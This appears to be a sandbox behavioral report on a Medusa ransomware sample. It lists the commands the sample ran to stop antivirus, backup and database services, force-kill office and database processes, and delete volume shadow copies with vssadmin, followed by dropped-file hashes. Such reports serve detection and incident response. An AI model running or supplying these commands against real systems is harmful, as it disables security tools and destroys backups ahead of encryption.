C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

Network

N/A

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 ae2ccfb68aaf040e01ec2280b75c4d49
SHA1 6dd072344d5159e751451ba24624a1e2adbe6e07
SHA256 beff87729e2c44475014eb1efd72bb128b33a9b22309339c2332e3f718e8c4cd
SHA512 69dc9b2ff371a8f49b2d236e81bcaba33df55d5e96f262b16a2de170c88832fbd8696f00e39ef5ee0d8ee85e988abc2b80b3901a773d9161f0d9dc525f5f1618

C:\$Recycle.Bin\S-1-5-21-457978338-2990298471-2379561640-1000\desktop.ini

MD5 a27b010e15755d8499e863c3a4496576
SHA1 79ba7210a0f2ae8027739c0df50fe113b6534e41
SHA256 dd12c3775c770a0b678274a55819cbd809f9771c9bc0e66a554927e83a7daafc
SHA512 b2177ead0d57e07f503b581dfa3cc9ca45f95dc2c1687b708a48b2beadc83346c663a5593319a863e8f996eb37f48cb3f9ac2e4453954f15ccbabd5f383a0a31

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-02 11:22

Reported

2024-10-02 11:24

Platform

win10v2004-20240802-en

